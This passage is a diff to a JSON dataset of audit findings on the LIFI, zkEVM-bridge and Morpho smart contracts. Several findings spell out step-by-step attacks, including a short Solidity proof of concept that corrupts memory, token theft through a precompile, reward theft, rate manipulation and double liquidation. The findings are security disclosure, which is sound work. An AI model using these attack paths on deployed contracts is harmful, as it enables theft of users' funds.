Since the Avalanche team has deprecated the dangerous pre-deployed contract, the current Executor contract is not vulnerable. Moonbeam's pre-deployed contract also has strange behaviors. The precompiled erc20 allows users to transfer native tokens through an ERC20 interface. Users can steal native tokens on the Executor by setting callTo = address(802) and calldata = transfer(receiver, amount). One of the standard Ethereum mainnet precompiles is \"Identity\" (0x4), which copies memory. Depending on the use of memory variables of the function that does the callTo, it can corrupt memory. Here is a POC: pragma solidity ^0.8.17; import \"hardhat/console.sol\"; contract Identity { function CorruptMem() public { uint dest = 128; uint data = dest + 1; uint len = 4; assembly { if iszero(call(gas(), 0x04, 0, add(data, 0x20), len, add(dest,0x20), len)) { invalid() } } } constructor() { string memory a = \"Test!\"; CorruptMem(); console.log(string(a)); // --> est!! } }", + "title": "_minDelay could be 0 without emergency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Normally min delay is only supposed to be 0 when in an emergency state. But this could be made 0 even in non-emergency mode as shown below: 1. Proposer can propose an operation for changing _minDelay to 0 via the updateDelay function. 2. Now, if this operation is executed by the executor then _minDelay will be 0 even without an emergency state.", "labels": [ "Spearbit", - "LIFI", + "zkEVM-bridge", "Severity: Informational" ] }, { - "title": "Documentation improvements", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There are a few issues in the documentation: HyphenFacet's documentation describes a function no longer present. Link to DexManagerFacet in README.md is incorrect.", + "title": "Incorrect/incomplete comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "There are a few mistakes in the comments that can be corrected in the codebase.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Check quoteTimestamp is within ten minutes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "quoteTimestamp is not validated. According to Across, the quoteTimestamp is the time at which the depositor will be quoted for L1 liquidity. This enables the depositor to know the L1 fees before submitting their deposit. It must be within 10 mins of the current time. function _startBridge(AcrossData memory _acrossData) internal { bool isNative = _acrossData.token == ZERO_ADDRESS; if (isNative) _acrossData.token = _acrossData.weth; else LibAsset.maxApproveERC20(IERC20(_acrossData.token), _acrossData.spokePool, _acrossData.amount); IAcrossSpokePool pool = IAcrossSpokePool(_acrossData.spokePool); pool.deposit{ value: isNative ? _acrossData.amount : 0 }( _acrossData.recipient, _acrossData.token, _acrossData.amount, _acrossData.destinationChainId, _acrossData.relayerFeePct, _acrossData.quoteTimestamp ); }", + "title": "Typos, grammatical and styling errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "There are a few typos and grammatical mistakes that can be corrected in the codebase. 
Some functions could also be renamed to better reflect their purposes.", "labels": [ "Spearbit", - "LIFI", + "zkEVM-bridge", "Severity: Informational" ] }, { - "title": "Integrate two versions of depositAsset()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function depositAsset(, , isNative ) doesn't check tokenId == NATIVE_ASSETID, although depositAsset(,) does. In the code base depositAsset(, , isNative ) isn't used. function depositAsset( address tokenId, uint256 amount, bool isNative ) internal { if (amount == 0) revert InvalidAmount(); if (isNative) { ... } else { ... } } function depositAsset(address tokenId, uint256 amount) internal { return depositAsset(tokenId, amount, tokenId == NATIVE_ASSETID); }", + "title": "Enforce parameters limits in initialize() of PolygonZkEVM", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function initialize() of PolygonZkEVM doesn't enforce limits on trustedAggregatorTimeout and pendingStateTimeout, whereas the update functions setTrustedAggregatorTimeout() and setPendingStateTimeout() do. As the project has indicated, it might be useful to set larger values in initialize(). function initialize(..., InitializePackedParameters calldata initializePackedParameters,...) ... { trustedAggregatorTimeout = initializePackedParameters.trustedAggregatorTimeout; ... pendingStateTimeout = initializePackedParameters.pendingStateTimeout; ... } function setTrustedAggregatorTimeout(uint64 newTrustedAggregatorTimeout) public onlyAdmin { require(newTrustedAggregatorTimeout <= HALT_AGGREGATION_TIMEOUT,....); ... trustedAggregatorTimeout = newTrustedAggregatorTimeout; ... } function setPendingStateTimeout(uint64 newPendingStateTimeout) public onlyAdmin { require(newPendingStateTimeout <= HALT_AGGREGATION_TIMEOUT, ... ); ... pendingStateTimeout = newPendingStateTimeout; ... }", "labels": [ "Spearbit", - "LIFI", + "zkEVM-bridge", "Severity: Informational" ] }, { - "title": "Simplify batchRemoveDex()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The code of batchRemoveDex() is somewhat difficult to understand and thus to maintain. function batchRemoveDex(address[] calldata _dexs) external { ... uint256 jlength = storageDexes.length; for (uint256 i = 0; i < ilength; i++) { ... for (uint256 j = 0; j < jlength; j++) { if (storageDexes[j] == _dexs[i]) { ... // update storageDexes.length; jlength = storageDexes.length; break; } } } }", + "title": "Funds can be sent to a non existing destination",
"html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", "body": "The functions bridgeAsset() and bridgeMessage() do check that the destination network is different than the current network. However, they don't check if the destination network exists. If accidentally the wrong networkId is given as a parameter, then the funds are sent to a non-existing network. If that network were deployed in the future, the funds would be recovered. However, in the meantime they are inaccessible and thus lost for the sender and recipient. Note: other bridges usually have validity checks on the destination. function bridgeAsset(...) ... { require(destinationNetwork != networkID, ... ); ... } function bridgeMessage(...) ... { require(destinationNetwork != networkID, ... ); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Medium Risk" ] }, { - "title": "Error handing in executeCallAndWithdraw", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "If isContract happens to be false then success is false (as it is initialized as false and not updated) Thus the _withdrawAsset() will never happen. Function withdraw() also exist so this functionality isnt necessary but its more logical to revert earlier. 50 function executeCallAndWithdraw(...) ... { ... bool success; bool isContract = LibAsset.isContract(_callTo); if (isContract) { false // thus is false ,! 
(success, ) = _callTo.call(_callData); } if (success) { // if this is false, then success stays _withdrawAsset(_assetAddress, _to, _amount); // this never happens if isContract == false } else { revert WithdrawFailed(); } }", + "title": "Wrong P2P exchange rate calculation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "_p2pDelta is divided by _poolIndex and multiplied by _p2pRate, nevertheless it should have been multiplied by _poolIndex and divided by _p2pRate to compute the correct share of the delta. This leads to wrong P2P rates throughout all markets if supply / borrow delta is involved.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Critical Risk" ] }, { - "title": "_withdrawAsset() could use LibAsset.transferAsset()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "A large part of the function _withdrawAsset() is very similar to LibAsset.transferAsset(). function _withdrawAsset(...) ... { ... if (_assetAddress == NATIVE_ASSET) { address self = address(this); if (_amount > self.balance) revert NotEnoughBalance(_amount, self.balance); (bool success, ) = payable(sendTo).call{ value: _amount }(\"\"); if (!success) revert WithdrawFailed(); } else { assetBalance = IERC20(_assetAddress).balanceOf(address(this)); if (_amount > assetBalance) revert NotEnoughBalance(_amount, assetBalance); SafeERC20.safeTransfer(IERC20(_assetAddress), sendTo, _amount); } ... }", + "title": "MatchingEngineForAave is using the wrong totalSupply in updateBorrowers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "_poolTokenAddress is referencing AToken so the totalStaked would be the total supply of the AToken. In this case, the totalStaked should reference the total supply of the DebtToken, otherwise the user would be rewarded the wrong amount of rewards.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Critical Risk" ] }, { - "title": "anySwapOut() doesnt lower allowance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function anySwapOut() only seems to work with Anyswap tokens. It burns the received to- kens here: AnyswapV5Router.sol#L334 This burning doesnt use/lower the allowance, so the allowance will stay present. Also see howto: function anySwapOut ==> no need to approve. function _startBridge(...) ... { ... LibAsset.maxApproveERC20(IERC20(underlyingToken), _anyswapData.router, _anyswapData.amount); ... IAnyswapRouter(_anyswapData.router).anySwapOut(...); }", + "title": "RewardsManagerAave does not verify token addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Aave has 3 different types of tokens: aToken, stable debt token and variable debt token (a/s/vToken). Aave's incentive controller can define rewards for all of them but Morpho never uses a stable-rate borrow token (sToken). The public accrueUserUnclaimedRewards function allows passing arbitrary token addresses for which to accrue user rewards. Current code assumes that if the token is not the variable debt token, then it must be the aToken, and uses the user's supply balance for the reward calculation as follows: uint256 stakedByUser = reserve.variableDebtTokenAddress == asset ? 
positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool : positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; An attacker can accrue rewards by passing in an sToken address and steal from the contract, i.e.: Attacker supplies a large amount of tokens for which sToken rewards are defined. The aToken reward index is updated to the latest index but the sToken index is not initialized. Attacker calls accrueUserUnclaimedRewards([sToken]), which will compute the difference between the current Aave reward index and the user's sToken index, then multiply it by their supply balance. The user's accumulated rewards in userUnclaimedRewards[user] can be withdrawn by calling PositionManager.claimRewards([sToken, ...]). Attacker withdraws their supplied tokens again. The above steps can be performed in one single transaction to steal unclaimed rewards from all Morpho positions.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Critical Risk" ] }, { - "title": "Anyswap rebrand", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Anyswap is rebranded to Multichain see rebrand.", + "title": "FullMath requires overflow behavior", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "UniswapV3's FullMath.sol is copied and migrated from an old Solidity version to version 0.8, which reverts on overflows, but the old FullMath relies on implicit overflow behavior. The current code will revert on overflows when it should not, breaking the SwapManagerUniV3 contract.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Check processing of native tokens in AnyswapFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The variable isNative seems to mean a wrapped native token is used (see function _getUnderly- ingToken() ). Currently startBridgeTokensViaAnyswap() skips LibAsset.depositAsset() when isNative == true, but a wrapped native tokens should also be moved via LibAsset.depositAsset(). Also _startBridge() tries to send native tokens with { value: _anyswapData.amount } then isNative == true, but this wouldnt work with wrapped tokens. The Howto seems to indicate an approval (of the wrapped native token) is neccesary. 52 contract AnyswapFacet is ILiFi, SwapperV2, ReentrancyGuard { ,! ,! function startBridgeTokensViaAnyswap(LiFiData calldata _lifiData, AnyswapData calldata _anyswapData) ... { { // Multichain (formerly Anyswap) tokens can wrap other tokens (address underlyingToken, bool isNative) = _getUnderlyingToken(_anyswapData.token, _anyswapData.router); if (!isNative) LibAsset.depositAsset(underlyingToken, _anyswapData.amount); ... } function _getUnderlyingToken(address token, address router) ... { ... if (token == address(0)) revert TokenAddressIsZero(); underlyingToken = IAnyswapToken(token).underlying(); // The native token does not use the standard null address ID isNative = IAnyswapRouter(router).wNATIVE() == underlyingToken; // Some Multichain complying tokens may wrap nothing if (!isNative && underlyingToken == address(0)) { underlyingToken = token; } } function _startBridge(... ) ... { ... if (isNative) { IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }(...); // ,! send native tokens } ... 
} }", + "title": "Morphos USDT mainnet market can end up in broken state", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Note that USDT on Ethereum mainnet is non-standard and requires resetting the approval to zero (see USDT L199) before being able to change it again. In _repayERC20ToPool , it could be that _amount is approved but then _amount = Math.min(...) only repays a smaller amount, meaning there remains a non-zero approval for Aave. Any further _repayERC20ToPool/_- supplyERC20ToPool calls will then revert in the approve call. Users cannot interact with most functions of the Morpho USDT market anymore. Example: Assume the attacker is first to borrow from the USDT market on Morpho. Attacker borrows 1000 USDT through Morpho from the Aave pool (and some other collateral to cover the debt). Attacker directly interacts with Aave to repay 1 USDT of debt for Aaves Morpho account position. Attacker attempts to repay 1000 USDT on Morpho. the contracts debt balance is only 999 and the _amount = Math.min(_amount, variableDebtTo- ken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) computation will only repay 999. An approval of 1 USDT remains. It will approve 1000 USDT but The USDT market is broken as it reverts on supply / repay calls when trying to approve the new amount", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Remove payable in swapAndCompleteBridgeTokensViaStargate()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant The function swapAndCompleteBridgeTokensViaStargate of Executor is payable but doesnt receive native to- kens. 53 contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { // not payable ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); // ,! doesn't send native assets ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { // is payable if (msg.sender != address(this)) { revert InvalidCaller(); } } }", + "title": "Wrong reserve factor computation on P2P rates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The reserve factor is taken on the entire P2P supply and borrow rates instead of just on the spread of the pool rates. Its currently overcharging suppliers and borrowers and making it possible to earn a worse rate on Morpho than the pool rates. supplyP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS - reserveFactor[_marketAddress])) / MAX_BASIS_POINTS; borrowP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS + reserveFactor[_marketAddress])) / MAX_BASIS_POINTS;", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Use the same order for inherited contracts.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The inheritance of contract isnt always done in the same order. For code consistency its best to always put them in the same order. 
contract AmarokFacet contract AnyswapFacet contract ArbitrumBridgeFacet contract CBridgeFacet contract GenericSwapFacet contract GnosisBridgeFacet contract HopFacet contract HyphenFacet contract NXTPFacet contract OmniBridgeFacet contract OptimismBridgeFacet contract PolygonBridgeFacet contract StargateFacet contract GenericBridgeFacet contract WormholeFacet contract AcrossFacet contract Executor is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, ReentrancyGuard { is ILiFi, ReentrancyGuard, Swapper { is ILiFi, ReentrancyGuard, SwapperV2 { is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi {", + "title": "SwapManager assumes Morpho token is token0 of every token pair", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The consult function wrongly assumes that the Morpho token is always the first token (token0) in the Morpho <> reward token pair. This could lead to inverted prices and a denial of service when claiming rewards, as the slippage check on the wrongly calculated expected amount reverts.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Catch potential revert in swapAndStartBridgeTokensViaStargate()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The following statement nativeFee -= _swapData[i].fromAmount; can revert in the swapAnd- StartBridgeTokensViaStargate(). function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { if (LibAsset.isNativeAsset(_swapData[i].sendingAssetId)) { nativeFee -= _swapData[i].fromAmount; // can revert } } ... }", + "title": "SwapManager fails at updating TWAP", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The update function returns early without updating the TWAP if the elapsed time is past the TWAP period. This means that once the TWAP period has passed, the TWAP is stale and forever represents an old value. This could lead to a denial of service when claiming rewards, as the slippage check on the wrongly calculated expected amount reverts.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "No need to use library If It is in the same file", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the LibAsset, some of the functions are called through LibAsset., however there is no need to call because the functions are in the same solidity file. ... ... 
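For the "SwapManager fails at updating TWAP" finding above, a sketch of an update() that keeps working after a full period has elapsed, modeled loosely on Uniswap V2's oracle example. The interface and field names are assumptions, and a production oracle would extrapolate the counters (e.g. via UniswapV2OracleLibrary.currentCumulativePrices) instead of reading the pair's last stored values:

pragma solidity ^0.8.0;

interface IUniswapV2PairLike {
    function price0CumulativeLast() external view returns (uint256);
    function getReserves() external view returns (uint112, uint112, uint32);
}

contract TwapSketch {
    uint32 public constant TWAP_PERIOD = 1 hours;

    IUniswapV2PairLike public immutable pair;
    uint256 public price0CumulativeLast;
    uint32 public blockTimestampLast;
    uint256 public price0Average; // UQ112x112-scaled price

    constructor(IUniswapV2PairLike _pair) {
        pair = _pair;
        price0CumulativeLast = _pair.price0CumulativeLast();
        (, , blockTimestampLast) = _pair.getReserves();
    }

    function update() external {
        uint256 priceCumulative = pair.price0CumulativeLast();
        (, , uint32 blockTimestamp) = pair.getReserves();
        uint32 timeElapsed;
        unchecked { timeElapsed = blockTimestamp - blockTimestampLast; } // overflow is intended
        if (timeElapsed < TWAP_PERIOD) return; // too soon: keep the last observation
        // Returning early when timeElapsed > TWAP_PERIOD (as the finding
        // describes) would freeze the TWAP forever; averaging over the whole
        // elapsed window is fine.
        unchecked { price0Average = (priceCumulative - price0CumulativeLast) / timeElapsed; }
        price0CumulativeLast = priceCumulative;
        blockTimestampLast = blockTimestamp;
    }
}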
if (msg.value != 0) revert NativeValueWithERC(); uint256 _fromTokenBalance = LibAsset.getOwnBalance(tokenId); LibAsset.transferFromERC20(tokenId, msg.sender, address(this), amount); if (LibAsset.getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount();", + "title": "P2P rate can be manipulated as it's a lazy-updated snapshot", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The P2P rate is lazy-updated upon interactions with the Morpho protocol. It takes the mid-rate of the current Aave supply and borrow rate. It's possible to manipulate these rates before triggering an update on Morpho. function _updateSPYs(address _marketAddress) internal { DataTypes.ReserveData memory reserveData = lendingPool.getReserveData( IAToken(_marketAddress).UNDERLYING_ASSET_ADDRESS() ); uint256 meanSPY = Math.average( reserveData.currentLiquidityRate, reserveData.currentVariableBorrowRate ) / SECONDS_PER_YEAR; // In ray } Example: Assume an attacker has a P2P supply position on Morpho and wants to earn a very high APY on it. He does the following actions in a single transaction: Borrow all funds on the desired Aave market. (This can be done by borrowing against flashloaned collateral). The utilisation rate of the market is now 100%. The borrow rate is the max borrow rate and the supply rate is (1.0 - reserveFactor) * maxBorrowRate. The max borrow rate can be higher than 100% APY, see Aave docs. The attacker triggers an update to the P2P rate, for example, by supplying 1 token to the pool PositionsManagerForAave.supply(poolTokenAddress, 1, ...), triggering marketsManager.updateSPYs(_poolTokenAddress). The new mid-rate is computed which will be (2.0 - reserveFactor) * maxBorrowRate / 2 ~ maxBorrowRate. The attacker repays their Aave debt in the same transaction, not paying any interest on it. All P2P borrowers now pay the max borrow rate to the P2P suppliers until the next time a user interacts with the market on Morpho. This process can be repeated to keep the APY high.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Combined Optimism and Synthetix bridge", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The Optimism bridge also includes a specific bridge for Synthetix tokens. Perhaps it is more clear to have a seperate Facet for this. function _startBridge(...) ... { ... if (_bridgeData.isSynthetix) { bridge.depositTo(_bridgeData.receiver, _amount); } else { ... } }", + "title": "Liquidating Morpho's Aave position leads to state desynchronization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Morpho has a single position on Aave that encompasses all of Morpho's individual user positions that are on the pool. When this Aave Morpho position is liquidated, the user position state tracked in Morpho desynchronizes from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. It's also possible to double-liquidate for a profit. Example: There's a single borrower B1 on Morpho who is connected to the Aave pool. B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho. The ETH price crashes and the position becomes liquidatable. A liquidator liquidates the position on Aave, earning the liquidation bonus. 
They repaid some debt and seized some collateral for profit. This repaid debt / removed collateral is not synced with Morpho. The user's supply and debt balances remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. The state remains desynced.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Doublecheck the Diamond pattern", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The LiFi protocol uses the diamond pattern. This pattern is relative complex and has overhead for the delegatecall. There is not much synergy between the different bridges (except for access controls & white lists). By combining all the bridges in one contract, the risk of one bridge might have an influence on another bridge.", + "title": "Frontrunners can exploit the system by not allowing head of DLL to match in P2P", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "For a given asset X, liquidity is supplied on the pool since there are not enough borrowers. suppliersOnPool head: 0xa with 1000 units of X. Whenever there is a new transaction in the mempool to borrow 100 units of X: Frontrunner supplies 1001 units of X and is supplied on pool. updateSuppliers will place the frontrunner on the head (assuming very high gas is supplied). The borrower's transaction lands and is matched for 100 units of X with the frontrunner in P2P. Frontrunner withdraws the remaining 901 units left, which were on the underlying pool. Favorable conditions for an attack: Relatively low gas fees & a relatively high block gas limit. insertSorted is able to traverse to the head within the block gas limit (i.e. the length of the DLL permits it). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block's time period.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Reference Diamond standard", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The LiFiDiamond.sol contract doesnt contain a reference to the Diamond contract. Having that would make it easier for readers of the code to find the origin of the contract.", + "title": "TWAP intervals should be flexible as per market conditions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The protocol is using the same TWAP_INTERVAL for both the weth-morpho and weth-reward token pools, while their liquidity and activity might be different. It should use separate appropriate values for both pools.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Validate Nxtp InvariantTransactionData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, It has been noticed that InvariantTransactionDatas fields are not validated. Even if the validation located in the router, sendingChainFallback and receivingAddress parameters are sensible and connext does not have meaningful error message on these parameter validation. 
Also, router parameter does not have any validation. Most of the other facets have. For instance : Amarok Facet Note: also see issue \"Hardcode bridge addresses via immutable\" function _startBridge(NXTPData memory _nxtpData) private returns (bytes32) { ITransactionManager txManager = ITransactionManager(_nxtpData.nxtpTxManager); IERC20 sendingAssetId = IERC20(_nxtpData.invariantData.sendingAssetId); // Give Connext approval to bridge tokens LibAsset.maxApproveERC20(IERC20(sendingAssetId), _nxtpData.nxtpTxManager, _nxtpData.amount); uint256 value = LibAsset.isNativeAsset(address(sendingAssetId)) ? _nxtpData.amount : 0; // Initiate bridge transaction on sending chain ITransactionManager.TransactionData memory result = txManager.prepare{ value: value }( ITransactionManager.PrepareArgs( _nxtpData.invariantData, _nxtpData.amount, _nxtpData.expiry, _nxtpData.encryptedCallData, _nxtpData.encodedBid, _nxtpData.bidSignature, _nxtpData.encodedMeta ) ); return result.transactionId; }", + "title": "PositionsManagerForAave claimToTreasury could allow sending underlying to 0x address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "claimToTreasury is currently not verifying that the treasuryVault address is != address(0). In the current state, it would allow the owner of the contract to burn the underlying token instead of sending it to the intended treasury address.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Executor contract should not handle cross-chain swap from Connext", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The Executor contract is designed to handle a swap at the destination chain. The LIFI protocol may build a cross-chain transaction to call Executor.swapAndCompleteBridgeTokens at the destination chain. In order to do a flexible swap, the Executor can perform arbitrary execution. Executor.sol#L323-L333 57 function _executeSwaps( LiFiData memory _lifiData, LibSwap.SwapData[] calldata _swapData, address payable _receiver ) private noLeftovers(_swapData, _receiver) { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ,! ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } However, the receiver address is a privileged address in some bridging services. Allowing users to do arbitrary execution/ external calls is dangerous. The Connext protocol is an example : Connext contractAPI#cancel The receiver address can prematurely cancel a cross-chain transaction. When a cross-chain execution is canceled, the funds would be sent to the fallback address without executing the external call. Exploiters can front-run a gelato relayer and cancel a cross-chain execution. The (post-swap) tokens will be sent to the receivers address. The exploiters can grab the tokens left in the Executor in the same transaction.", + "title": "rewardsManager used in MatchingEngineForAave could be not initialized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "MatchingEngineForAave updates the userUnclaimedRewards for a supplier/borrower each time they get updated. 
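For the claimToTreasury finding above, a minimal sketch of the missing guard; the function shape is assumed from the finding (IAToken from Aave v2, safeTransfer via a SafeERC20-style library), not copied from Morpho:

// Sketch only: revert instead of transferring the reserve fee to address(0).
// Assumes `using SafeERC20 for IERC20;` and an onlyOwner modifier in scope.
function claimToTreasury(address _poolTokenAddress) external onlyOwner {
    require(treasuryVault != address(0), "treasury vault not set");
    IERC20 underlyingToken = IERC20(IAToken(_poolTokenAddress).UNDERLYING_ASSET_ADDRESS());
    uint256 amountToClaim = underlyingToken.balanceOf(address(this));
    require(amountToClaim > 0, "nothing to claim"); // also avoids the zero-amount transfer flagged later on
    underlyingToken.safeTransfer(treasuryVault, amountToClaim);
    emit ReserveFeeClaimed(_poolTokenAddress, amountToClaim);
}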
rewardsManager is not initialized in PositionsManagerForAaveLogic.initialize but only via PositionsManagerForAaveGettersSetters.setRewardsManager, which means that it will start as address(0). Each time a supplier or borrower gets updated and the rewardsManager address is empty, the transaction will revert. To replicate the issue, just comment out positionsManager.setRewardsManager(address(rewardsManager)); in TestSetup and run make c-TestSupply. All tests will fail with [FAIL. Reason: Address: low-level delegate call failed]", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Avoid using strings in the interface of the Axelar Facet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The Axelar Facet uses strings to indicate the destinationChain, destinationAddress, which is different then on other bridge facets. function executeCallWithTokenViaAxelar( string memory destinationChain, string memory destinationAddress, string memory symbol, ... ) ...{ } The contract address is (or at least can be) encoded as a hex string, as seen in this example: /// https://etherscan.io/tx/0x7477d550f0948b0933cf443e9c972005f142dfc5ef720c3a3324cefdc40ecfa2 # 0 1 2 3 4 Type Name destinationChain string destinationContractAddress payload symbol amount bytes string uint256 50000000 0xA57ADCE1d2fE72949E4308867D894CD7E7DE0ef2 Data binance string USDC 58 The Axelar bridge allows bridging to non EVM chains, however the LiFi protocol doesnt seem to support thus. So its good to prevent accidentally sending to non EVM chains. Here are the supported non EVM chains: non-evm- networks The Axelar interface doesnt have a (compatible) emit.", + "title": "Missing input validation checks on contract initialize/constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "initialize/constructor input parameters should always be validated to prevent the creation/initialization of a 